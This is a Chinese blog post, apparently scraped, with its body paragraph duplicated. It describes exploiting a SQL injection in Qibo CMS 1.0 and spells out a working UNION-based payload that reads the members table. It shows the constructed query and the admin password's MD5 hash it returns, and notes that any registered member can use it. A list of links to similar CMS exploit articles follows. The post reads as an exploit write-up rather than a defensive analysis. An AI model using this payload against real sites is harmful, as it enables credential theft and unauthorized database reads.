齐博CMS1.0全版本的sql注入漏洞
2018-04-03 11:36
281 查看
详见:http://dingody.iteye.com/blog/2195864
这里只说一下最后的利用,还是使用原作者指出的那个注入点,
虽然value值保存在了两个sql语句里面,这两个语句的列不一样,如果利用第二个语句,会在第一个语句的时候报列不一致的错误;尝试利用第一个语句。
我构造的语句是 1' union select password from qibosoft_members;#
这里最后只能用#来注释掉最后的单引号,使用--仍然会报错。
所以,拼接出来的sql语句是SELECT aid FROM qibosoft_comment WHERE cid='1' union select password from qibosoft_members;#'
读取用户表中的密码列;打印出执行语句的返回值
'aid' => '21232f297a57a5a743894a0e4a801fc3' (length=32)打印出的是用户admin的加密密码,MD5解密即可。
同理,修改表名和列名可以任意读取表的内容。
不过想要利用该点需要登陆member系统,只要随意注册一个用户登陆即可,便可以读取到用户admin的密码。
这里返回的只是第一行的结果。
这里只说一下最后的利用,还是使用原作者指出的那个注入点,
虽然value值保存在了两个sql语句里面,这两个语句的列不一样,如果利用第二个语句,会在第一个语句的时候报列不一致的错误;尝试利用第一个语句。
我构造的语句是 1' union select password from qibosoft_members;#
这里最后只能用#来注释掉最后的单引号,使用--仍然会报错。
所以,拼接出来的sql语句是SELECT aid FROM qibosoft_comment WHERE cid='1' union select password from qibosoft_members;#'
读取用户表中的密码列;打印出执行语句的返回值
'aid' => '21232f297a57a5a743894a0e4a801fc3' (length=32)打印出的是用户admin的加密密码,MD5解密即可。
同理,修改表名和列名可以任意读取表的内容。
不过想要利用该点需要登陆member系统,只要随意注册一个用户登陆即可,便可以读取到用户admin的密码。
这里返回的只是第一行的结果。
相关文章推荐
- 【漏洞公告】WordPress全版本WPDBSQL注入漏洞
- ThinkPHP框架通杀所有版本的一个SQL注入漏洞详细分析及测试方法
- DedeCMS全版本通杀SQL注入漏洞利用代码及工具
- 对于ThinkPHP框架早期版本的一个SQL注入漏洞详细分析
- DedeCMS全版本通杀SQL注入漏洞利用代码及工具
- Invision Power Board 1.3.1及更低版本SQL注入漏洞
- [分析]-DedeCMS全版本通杀SQL注入漏洞
- [分析]-DedeCMS全版本通杀SQL注入漏洞
- ThinkPHP最新版本SQL注入漏洞
- DedeCMS V5.7sp2最新版本parse_str函数SQL注入漏洞
- IPB论坛1.3.1及更低版本SQL注入漏洞
- ecshop 2.6.2 版本的sql注入漏洞
- DedeCMS全版本通杀SQL注入漏洞利用代码
- googInvision Power Board 1.3.1及更低版本SQL注入漏洞le的蜘蛛来了
- 【安全牛学习笔记】KALI版本更新和手动漏洞挖掘(SQL注入)
- Drupal 7.31版本爆严重SQL注入漏洞
- 【安全牛学习笔记】KALI版本更新(第一个ROLLING RELEASE)和手动漏洞挖掘(SQL注入)
- Joomla 3.4.3版本 SQL注入漏洞分析
- 对于ThinkPHP框架早期版本的一个SQL注入漏洞详细分析
- ecshop 全系列版本网站漏洞 远程代码执行sql注入漏洞